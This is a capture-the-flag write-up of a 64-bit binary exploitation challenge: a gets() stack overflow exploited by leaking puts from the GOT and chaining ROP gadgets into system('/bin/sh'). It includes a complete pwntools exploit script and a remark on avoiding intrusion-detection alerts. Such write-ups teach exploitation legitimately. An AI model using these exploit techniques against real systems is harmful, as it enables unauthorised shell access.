Hacktivitycon CTF 2021 - The Library

"The Library" is a binary exploitation challenge in Hacktivitycon CTF 2021. You can download the challenge file here and the libc here.

Static + Dynamic Analysis

<cjason@cj-basepc:library>>$ pwn checksec the_library
[!] Could not populate PLT: The 'unicorn<1.0.2rc4,>=1.0.2rc1' distribution was not found and is required by pwntools
[*] '/home/cjason/ctfs/hacktivity/pwn/library/the_library'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

<cjason@cj-basepc:library>>$ r2 the_library
WARNING: No calling convention defined for this file, analysis may be inaccurate.
 -- Here be dragons.
[0x00401190]> aaa
[Warning: set your favourite calling convention in `e anal.cc=?`
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Finding and parsing C++ vtables (avrr)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information (aanr)
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00401190]> afl
0x00401190    1 47           entry0
0x004011d0    4 33   -> 31   sym.deregister_tm_clones
0x00401200    4 49           sym.register_tm_clones
0x00401240    3 33   -> 32   sym.__do_global_dtors_aux
0x00401270    1 6            entry.init0
0x004014a0    1 5            sym.__libc_csu_fini
0x004014a8    1 13           sym._fini
0x00401430    4 101          sym.__libc_csu_init
0x004011c0    1 5            sym._dl_relocate_static_pie
0x004012a9    9 384          main
0x00401000    3 27           sym._init
0x00401276    1 51           sym.setup
0x00401110    1 11           sym.imp.setbuf
0x004010e0    1 11           sym.imp.puts
0x004010f0    1 11           sym.imp.fread
0x00401100    1 11           sym.imp.fclose
0x00401120    1 11           sym.imp.printf
0x00401130    1 11           sym.imp.srand
0x00401140    1 11           sym.imp.gets
0x00401150    1 11           sym.imp.fopen
0x00401160    1 11           sym.imp.atoi
0x00401170    1 11           sym.imp.exit
0x00401180    1 11           sym.imp.rand

Similar to Retcheck, there is no stack canary and PIE is disabled. One important thing to note is that this is a 64-bit binary, so techniques for 32-bit binaries do not carry over directly, because functions are called differently. In a 32-bit binary (cdecl), arguments are passed on the stack; in a 64-bit binary (System V AMD64 ABI), the first six integer arguments are passed in registers (rdi, rsi, rdx, rcx, r8, r9).
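To make the difference concrete, here is a minimal sketch of how a ret2libc chain calling system(arg) is laid out under each convention. All addresses are hypothetical and only illustrate the layout; p32/p64 are local stand-ins for the pwntools helpers of the same name.

```python
import struct

def p32(x: int) -> bytes:
    """Pack a 32-bit little-endian word (like pwntools' p32)."""
    return struct.pack("<I", x)

def p64(x: int) -> bytes:
    """Pack a 64-bit little-endian word (like pwntools' p64)."""
    return struct.pack("<Q", x)

def ret2libc_x86(system: int, fake_ret: int, arg: int) -> bytes:
    # 32-bit cdecl: on entry, system expects [esp] = return address and
    # [esp+4] = first argument, so the argument simply follows on the stack
    return p32(system) + p32(fake_ret) + p32(arg)

def ret2libc_x64(pop_rdi_ret: int, arg: int, system: int) -> bytes:
    # 64-bit System V: system reads its first argument from rdi, so a
    # "pop rdi; ret" gadget must load it before we return into system
    return p64(pop_rdi_ret) + p64(arg) + p64(system)

# Hypothetical addresses, for layout only
x86 = ret2libc_x86(system=0xf7e12340, fake_ret=0xdeadbeef, arg=0xf7f5a000)
x64 = ret2libc_x64(pop_rdi_ret=0x401493, arg=0x7f0000001000, system=0x7f0000002000)
print(len(x86), len(x64))  # 12 24
```

The extra gadget in the 64-bit chain is exactly why the rest of this writeup hunts for a "pop rdi; ret" sequence.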

Decompiled sym.main using r2ghidra:

undefined8 main(void)
{
    int32_t iVar1;
    int64_t var_220h;
    int64_t var_18h;
    uint32_t var_10h;
    undefined8 var_4h;

    _var_10h = 0;
    _var_10h = sym.imp.fopen("/dev/urandom", 0x4020ba);
    if (_var_10h == 0) {
        sym.imp.exit(1);
    }
    sym.imp.fread(&var_18h, 4, 1);
    sym.imp.fclose(_var_10h);
    sym.imp.srand((undefined4)var_18h);
    sym.imp.puts("Welcome to The Library.\n");
    sym.imp.puts("Books:");
    for (var_4h._0_4_ = 0; (int32_t)var_4h < 6; var_4h._0_4_ = (int32_t)var_4h + 1) {
        sym.imp.printf("%d. %s\n", (int32_t)var_4h + 1, *(undefined8 *)(obj.BOOKS + (int64_t)(int32_t)var_4h * 8));
    }
    sym.imp.puts(0x4020f1);
    sym.imp.puts("I am thinking of a book.");
    sym.imp.puts("Which one is it?");
    sym.imp.printf(0x40211c);
    sym.imp.gets(&var_220h);
    var_18h._4_4_ = sym.imp.atoi(&var_220h);
    iVar1 = sym.imp.rand();
    if (var_18h._4_4_ == iVar1 % 5 + 1) {
        sym.imp.puts("Correct!");
    }
    else {
        sym.imp.puts("Wrong :(");
    }
    return 0;
}

The gets function reads input without any length limit, so main is vulnerable to a stack buffer overflow. Now we just need to find the offset to the return address. In Retcheck, we used a cyclic pattern to find the offset. Let's try a different approach here and compute the offset from the rbp-relative position of var_220h, the buffer passed to gets.

[0x004012a9]> pdf
            ; DATA XREF from entry0 @ 0x4011b1
┌ 384: main ();
│           ; var int64_t var_220h @ rbp-0x220
│           ; var int64_t var_18h @ rbp-0x18
│           ; var uint32_t var_14h @ rbp-0x14
│           ; var uint32_t var_10h @ rbp-0x10
│           ; var signed int64_t var_4h @ rbp-0x4

...

var_220h is located at rbp-0x220, i.e. 544 bytes below rbp. The saved rbp occupies the 8 bytes starting at rbp, and the return address is at rbp+0x8. Thus, the offset from the start of the buffer to the return address is 544 + 8 = 552. To confirm this, we run the binary with the input python -c 'print("A"*552+"B"*8)'.
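The offset arithmetic and the test input can be sketched in a few lines of Python. The only input is the rbp offset reported by r2; the check at the end simply confirms which 8 bytes of the input land on the return address.

```python
import struct

# From r2: "var int64_t var_220h @ rbp-0x220"
BUF_RBP_OFFSET = 0x220
SAVED_RBP_SIZE = 8  # the saved rbp sits between the buffer and the return address

offset = BUF_RBP_OFFSET + SAVED_RBP_SIZE
print(offset)  # 552

# Test input: fill up to the return address with 'A', then 8 'B's
payload = b"A" * offset + b"B" * 8

# If the offset is right, main's ret should try to jump to this value
ret_target = struct.unpack("<Q", payload[offset:offset + 8])[0]
print(hex(ret_target))  # 0x4242424242424242
```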

<cjason@cj-basepc:library>>$ gdb the_library
GNU gdb (GDB) 10.2
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 190 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from the_library...
(No debugging symbols found in the_library)
pwndbg> r < <(python -c 'print("A"*552+"B"*8)')
Starting program: /home/cjason/ctfs/hacktivity/pwn/library/the_library < <(python -c 'print("A"*552+"B"*8)')
Welcome to The Library.

Books:
1. Sandworm
2. Little Brother
3. Breaking and Entering: The Extraordinary Story of a Hacker Called Alien
4. Hacking: The Art of Exploitation
5. Countdown to Zero Day
6. Practical Malware Analysis

I am thinking of a book.
Which one is it?
> Wrong :(

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401428 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x401430 (__libc_csu_init) ◂— endbr64
 RCX  0x7ffff7eb6907 (write+23) ◂— cmp    rax, -0x1000 /* 'H=' */
 RDX  0x0
 RDI  0x7ffff7f8a4d0 (_IO_stdfile_1_lock) ◂— 0x0
 RSI  0x7ffff7f885a3 (_IO_2_1_stdout_+131) ◂— 0xf8a4d0000000000a /* '\n' */
 R8   0x9
 R9   0x7ffff7f870a0 (pa_next_type) ◂— 0x8
 R10  0x7ffff7f39ac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000
 R11  0x246
 R12  0x401190 (_start) ◂— endbr64
 R13  0x0
 R14  0x0
 R15  0x0
 RBP  0x4141414141414141 ('AAAAAAAA')
 RSP  0x7fffffffdfd8 ◂— 'BBBBBBBB'
 RIP  0x401428 (main+383) ◂— ret
─────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────
 ► 0x401428 <main+383>    ret    <0x4242424242424242>

The ret <0x4242424242424242> confirms both the vulnerability and our offset of 552 (rbp is overwritten with 'AAAAAAAA', as expected). Now let's think about how we can exploit this. There are no obvious functions in the binary that we can abuse, nor do any of the PLT functions give us a way to pop a shell or read the flag. We also cannot inject shellcode onto the stack because the NX bit is set, so data on the stack is not executable. That leaves one option: a "return to libc" attack (informative read here).

Setting up the dynamic linker to use the challenge libc

In order to do that, we first need to test the binary against the same libc that the server uses. The challenge provides a shared object, libc-2.31.so, which is presumably that libc. A libc generally has to be loaded by the dynamic linker (ld.so) from the same glibc build, so we need the matching ld-2.31.so and have to set the binary's interpreter to it, forcing the binary to use this libc instead of your system's. The easiest way to achieve this is pwninit: simply run pwninit --no-template, which automatically downloads the matching dynamic linker and patches the ELF to set the interpreter (the --no-template flag stops it from creating an exploit template, because we will write our own here).
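For reference, the patching step can be approximated by hand with patchelf. This is a rough sketch, not a reproduction of what pwninit does internally: it assumes patchelf is installed, that ld-2.31.so is already in the working directory, and that the provided libc is available there under the name libc.so.6 (for example as a copy or symlink of libc-2.31.so). A relative interpreter path like ./ld-2.31.so only resolves when the binary is run from that directory.

```python
import shutil
import subprocess
from pathlib import Path
from typing import List

def patchelf_cmd(binary: str, loader: str, rpath: str = ".") -> List[str]:
    # --set-interpreter rewrites the ELF's PT_INTERP (the dynamic linker path);
    # --set-rpath tells that linker where to search for libc.so.6
    return ["patchelf", "--set-interpreter", loader, "--set-rpath", rpath, binary]

def patch(original: str, patched: str, loader: str) -> None:
    # Work on a copy so the original challenge binary stays untouched
    shutil.copy(original, patched)
    subprocess.run(patchelf_cmd(patched, loader), check=True)

if __name__ == "__main__" and Path("the_library").exists():
    patch("the_library", "the_library_patched", "./ld-2.31.so")
```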

If everything works, we should see the following output when we run ldd on the original and patched binaries. Notice that the original binary uses the system's libc (/usr/lib/libc.so.6), while the patched binary uses the libc in the working directory.

<cjason@cj-basepc:library>>$ ldd ./the_library
        linux-vdso.so.1 (0x00007ffc6fbf3000)
        libc.so.6 => /usr/lib/libc.so.6 (0x00007fe332d5c000)
        /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fe332f5c000)
<cjason@cj-basepc:library>>$ ldd ./the_library_patched
        linux-vdso.so.1 (0x00007ffdefd04000)
        libc.so.6 => ./libc.so.6 (0x00007f3fa9425000)
        ./ld-2.31.so => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f3fa9619000)

Leaking base address of libc

Even though PIE is not enabled, the address of libc is still randomized. PIE only determines whether the binary itself is loaded at a random address; shared libraries such as libc are randomized by ASLR (address space layout randomization) regardless. So although the offsets of individual functions within a given libc can easily be looked up in databases like this one, the base address at which libc is loaded changes from run to run, and it is random enough that guessing it and hoping to get lucky is not practical.

Before we can "return to libc", we first need to leak the base address of libc. We can do that by printing the address stored in an entry of the GOT (global offset table). In simple terms, the actual address of a dynamically linked function is not known at compile time, so calls go through small placeholder stubs in the PLT (procedure linkage table). A PLT stub merely jumps to the address stored in the corresponding GOT entry, which holds the function's real address in the library at runtime. Because this binary has Full RELRO, every GOT entry is resolved before main runs. So, if we read the value in a GOT entry and know that function's offset within libc, we can compute the base address of libc!

Thus, let's formulate a method to leak a value from the GOT:

Place the address of a GOT entry into rdi, the register that holds a function's first argument.
Call a function that prints the data at that address.

I chose puts both as the function whose GOT entry we leak and as the function that prints it. puts takes only one argument, a pointer to the string to print. According to the x64 (System V) calling convention, the first argument goes in rdi, so we need to place the address of puts@got in rdi. To build our payload, we first need to find what is known as a "gadget": a short instruction sequence ending in ret, in this case one that pops a value from the stack into rdi and then returns. pwndbg's rop command, which wraps ROPgadget, makes this easy:

pwndbg> rop --grep "pop rdi"
0x0000000000401493 : pop rdi ; ret
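Gadgets are just byte sequences in executable memory: pop rdi encodes as 0x5f and ret as 0xc3. The sketch below scans a byte string for them, which is the core idea behind tools like ROPgadget (real tools also decode instructions and search every executable section). The input bytes are an assumption: 41 5f c3 (pop r15; ret) is the usual tail of __libc_csu_init, and placing it at 0x401492 matches the reported gadget, but these bytes were not dumped from the binary. It also shows why adding 1 to a "pop rdi; ret" address yields a bare ret.

```python
from typing import Dict, List

def find_gadgets(code: bytes, base: int) -> Dict[str, List[int]]:
    """Return addresses of 'pop rdi; ret' (5f c3) and bare 'ret' (c3) in code."""
    gadgets: Dict[str, List[int]] = {"pop rdi; ret": [], "ret": []}
    for i in range(len(code)):
        if code[i:i + 2] == b"\x5f\xc3":
            gadgets["pop rdi; ret"].append(base + i)
        if code[i] == 0xC3:
            gadgets["ret"].append(base + i)
    return gadgets

# Hypothetical bytes: "pop r15; ret" (41 5f c3), starting at 0x401492.
# Jumping one byte into "pop r15" decodes as "pop rdi; ret".
g = find_gadgets(b"\x41\x5f\xc3", 0x401492)
print({k: [hex(a) for a in v] for k, v in g.items()})
# {'pop rdi; ret': ['0x401493'], 'ret': ['0x401494']}
```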

Next, we need the addresses of puts@plt and puts@got: we call puts@plt with puts@got as its argument to leak the contents of puts@got. Let's find these two addresses in gdb.

pwndbg> info functions
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010e0  puts@plt
0x00000000004010f0  fread@plt
0x0000000000401100  fclose@plt
0x0000000000401110  setbuf@plt
0x0000000000401120  printf@plt
0x0000000000401130  srand@plt
0x0000000000401140  gets@plt
0x0000000000401150  fopen@plt
0x0000000000401160  atoi@plt
0x0000000000401170  exit@plt
0x0000000000401180  rand@plt
0x0000000000401190  _start
0x00000000004011c0  _dl_relocate_static_pie
0x00000000004011d0  deregister_tm_clones
0x0000000000401200  register_tm_clones
0x0000000000401240  __do_global_dtors_aux
0x0000000000401270  frame_dummy
0x0000000000401276  setup
0x00000000004012a9  main
0x0000000000401430  __libc_csu_init
0x00000000004014a0  __libc_csu_fini
0x00000000004014a8  _fini
pwndbg> disas 0x00000000004010e0
Dump of assembler code for function puts@plt:
   0x00000000004010e0 <+0>:     endbr64
   0x00000000004010e4 <+4>:     bnd jmp QWORD PTR [rip+0x2ead]        # 0x403f98 <puts@got.plt>
   0x00000000004010eb <+11>:    nop    DWORD PTR [rax+rax*1+0x0]
End of assembler dump.
pwndbg>
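The GOT address in gdb's comment can be double-checked by hand. On x86-64, a [rip+disp] operand is relative to the address of the next instruction, which the dump shows at 0x4010eb:

```python
# From the disassembly of puts@plt:
#   0x4010e4 <+4>:  bnd jmp QWORD PTR [rip+0x2ead]
#   0x4010eb <+11>: nop ...
# rip-relative operands are computed from the address of the NEXT instruction
next_insn = 0x4010EB
disp = 0x2EAD
puts_got = next_insn + disp
print(hex(puts_got))  # 0x403f98
```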

We got 0x4010e0 for puts@plt and 0x403f98 for puts@got. Now consider what happens after this payload runs: puts prints its own libc address, which lets us compute the libc base, but then the chain ends and the program terminates, leaving no room for our actual payload! Restarting the binary from scratch would not help, because ASLR gives every new process a fresh libc base and the leak would be useless. Instead, we need to "restart" the program inside the same process (without exiting), so that on the second run we already know the base address of libc and are ready to pop a shell.

To do this, we return to _start at address 0x401190, which sets up the C runtime again and calls main a second time. Thus, our first payload looks like this:

[ padding = b'A'* 552 ]
[ 0x401493            ] (pop rdi; ret;)
[ 0x403f98            ] (puts@got)
[ 0x4010e0            ] (puts@plt)
[ 0x401190            ] (_start)

If we feed this to the program, we should expect two things. First, it should print a few raw, mostly unprintable bytes (not a readable hex string): the little-endian address of puts in the loaded libc. Second, it should prompt us for input again. Let's try this out.

#!/usr/bin/env python3
# solve.py

from pwn import *

#conn = remote('challenge.ctf.games', 30384)
conn = process('./patched')

padding = b'A' * 552

# Stage 1: call puts@plt(puts@got) to leak puts' libc address,
# then return to _start so the program runs again in the same process
pop_rdi_ret = p64(0x401493)   # pop rdi; ret
puts_got    = p64(0x403f98)   # GOT entry holding puts' libc address
puts_plt    = p64(0x4010e0)   # PLT stub for puts
ret2start   = p64(0x401190)   # _start
payload = padding + pop_rdi_ret + puts_got + puts_plt + ret2start

conn.recvuntil(b'> ')
conn.sendline(payload)
conn.interactive()

Where "patched" is the patched binary. Running the script results in the following output:

<cjason@cj-basepc:library>>$ python solve.py
[+] Starting local process './patched': pid 35989
[*] Switching to interactive mode
Wrong :(
\xa0Ua\x94~\x7f
Welcome to The Library.

Books:
1. Sandworm
2. Little Brother
3. Breaking and Entering: The Extraordinary Story of a Hacker Called Alien
4. Hacking: The Art of Exploitation
5. Countdown to Zero Day
6. Practical Malware Analysis

I am thinking of a book.
Which one is it?
> $ 1
Wrong :(
[*] Process './patched' stopped with exit code 0 (pid 35989)
[*] Got EOF while reading in interactive
$

We see that right after the first "Wrong :(", we have \xa0Ua\x94~\x7f. The program then prompts us for input a second time, which we answer and are greeted with a second "Wrong :(". Now, let's confirm that \xa0Ua\x94~\x7f is indeed the address of puts in libc. These are six bytes (a0 55 61 94 7e 7f): puts stops at the first null byte, so the two zero high bytes of the 64-bit address are not printed. Reading the bytes as a little-endian integer gives the address 0x7f7e946155a0.
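The conversion can be done with the standard library alone. This mirrors the u64(leak.ljust(8, b"\x00")) idiom used with pwntools: the missing high bytes are padded back as zeros before unpacking.

```python
leak = b"\xa0Ua\x94~\x7f"  # bytes printed by puts, newline already stripped

# puts stops at the first null byte, so the two zero high bytes of the
# 64-bit address are missing; pad them back before unpacking
addr = int.from_bytes(leak.ljust(8, b"\x00"), "little")
print(hex(addr))  # 0x7f7e946155a0
```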

A quick check of the provided libc gives its exact version, which we can look up in the libc database to match against the leak:

<cjason@cj-basepc:library>>$ strings libc-2.31.so | grep 2.3
GLIBC_2.3
GLIBC_2.3.2
GLIBC_2.3.3
GLIBC_2.3.4
GLIBC_2.30
glibc 2.31
NPTL 2.31
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31.
libc-2.31.so

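In this build (Ubuntu GLIBC 2.31-0ubuntu9.2), puts is at offset 0x875a0. Its low 12 bits (0x5a0) match those of the leaked address, which is what we expect, since ASLR only shifts libc by whole pages. So, to calculate the base address, we subtract this offset from the leaked address of puts: 0x7f7e946155a0 - 0x875a0 = 0x7f7e9458e000.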
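A small helper makes the subtraction and the page-alignment sanity check explicit. The puts offset is the one given for this libc; the helper name is illustrative.

```python
PUTS_OFFSET = 0x875A0  # puts in libc 2.31-0ubuntu9.2 (from the libc database)

def libc_base(leaked_puts: int, puts_offset: int = PUTS_OFFSET) -> int:
    base = leaked_puts - puts_offset
    # libc is mapped at a page boundary, so a correct base ends in 0x000;
    # anything else means the leak or the offset (i.e. the libc version) is wrong
    if base & 0xFFF:
        raise ValueError(f"base {base:#x} is not page-aligned; wrong libc?")
    return base

print(hex(libc_base(0x7F7E946155A0)))  # 0x7f7e9458e000
```

Checking alignment is a cheap way to catch a mismatched libc before sending the second payload.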

Final Payload

Now, before we execute the return-to-libc attack, we need two final ingredients: the offset of the system function and the offset of a "/bin/sh" string inside libc. According to the libc database, they are 0x55410 and 0x1b75aa respectively (exit, used at the end of the chain, is at 0x49bc0). Our second payload looks like this:

[ padding = b'A'* 552 ]
[ 0x401493 + 1        ] (ret;)
[ 0x401493            ] (pop rdi; ret;)
[ libcbase + 0x1b75aa ] (libc address of "/bin/sh")
[ libcbase + 0x055410 ] (libc address of system)
[ libcbase + 0x049bc0 ] (libc address of exit)

The last address is libc's exit, so that when system returns (after we exit the shell) the program terminates gracefully instead of returning into garbage and crashing; a crash might leave logs that alert intrusion detection to our presence. Why do we need 0x401493 + 1, an additional ret instruction at the start of our ROP chain? The gadget at 0x401493 is pop rdi (0x5f) followed by ret (0xc3), so 0x401494 is a bare ret. Without it, rsp is not 16-byte aligned when system is entered, and the instruction movaps xmmword ptr [rsp + 0x50], xmm0 inside glibc's system implementation crashes, because movaps requires a 16-byte-aligned memory operand. The extra ret consumes one more 8-byte stack slot, which restores the alignment (more details can be seen here).
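The alignment argument can be checked with a little arithmetic. This sketch assumes rsp at main's ret is 0x7fffffffdfd8, as in the gdb crash earlier; the absolute value differs on the second run via _start, but assuming main is entered with an ABI-conformant stack both times, its value modulo 16 is the same. Under the System V ABI, rsp is 16-byte aligned before a call, so at function entry rsp % 16 == 8.

```python
SLOT = 8  # every ROP chain entry is one 64-bit word

def rsp_at_entry(rsp_at_main_ret: int, chain: list, target: str) -> int:
    """rsp value when execution reaches `target` through a ret.

    At main's ret, rsp points at chain[0]; every slot up to and including
    the target's own slot has been popped by the time we land there.
    """
    index = chain.index(target)
    return rsp_at_main_ret + SLOT * (index + 1)

def aligned_for_call(rsp: int) -> bool:
    # At entry (return address "pushed"), a correctly aligned rsp is 8 mod 16
    return rsp % 16 == 8

RSP = 0x7FFFFFFFDFD8  # rsp at main's ret, from the gdb crash

without_ret = ["pop rdi; ret", "/bin/sh", "system", "exit"]
with_ret = ["ret", "pop rdi; ret", "/bin/sh", "system", "exit"]

for chain in (without_ret, with_ret):
    rsp = rsp_at_entry(RSP, chain, "system")
    print(chain[0], hex(rsp), aligned_for_call(rsp))
# pop rdi; ret 0x7fffffffdff0 False
# ret 0x7fffffffdff8 True
```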

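#!/usr/bin/env python3
# solve.py: stage 1 leaks libc, stage 2 calls system("/bin/sh")
from pwn import *

conn = remote('challenge.ctf.games', 30384)
#conn = process('./patched')

padding = b'A' * 552

# Addresses in the non-PIE binary
pop_rdi_ret = p64(0x401493)      # pop rdi; ret
ret_gadget  = p64(0x401493 + 1)  # the lone ret of the gadget above, for alignment
puts_got    = p64(0x403f98)
puts_plt    = p64(0x4010e0)
ret2start   = p64(0x401190)      # _start: run main again in the same process

# Stage 1: puts(puts@got), then return to _start
payload = padding + pop_rdi_ret + puts_got + puts_plt + ret2start
conn.recvuntil(b'> ')
conn.sendline(payload)

conn.recvline()                 # "Wrong :("
leak = conn.recvline()[:-1]     # raw little-endian address, newline stripped
leaked_puts = u64(leak.ljust(8, b'\x00'))
libcbase = leaked_puts - 0x875a0  # puts offset in libc 2.31-0ubuntu9.2
log.info(f'libc base: {hex(libcbase)}')

# Offsets in the provided libc-2.31.so
bin_sh_addr = p64(libcbase + 0x1b75aa)
lc_sys_addr = p64(libcbase + 0x055410)
exit_addr   = p64(libcbase + 0x049bc0)

# Stage 2: ret (align) -> pop rdi; ret -> system("/bin/sh") -> exit
payload = padding + ret_gadget + pop_rdi_ret + bin_sh_addr + lc_sys_addr + exit_addr
conn.recvuntil(b'> ')
conn.sendline(payload)
conn.interactive()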

Key Takeaways:

Easily "restart" a program by adding the address of _start or sym.main at the end of the ROP chain used to leak the libc address.
Ensure 16-byte stack alignment in x64 exploits by adding a ret gadget at the beginning of the ROP chain.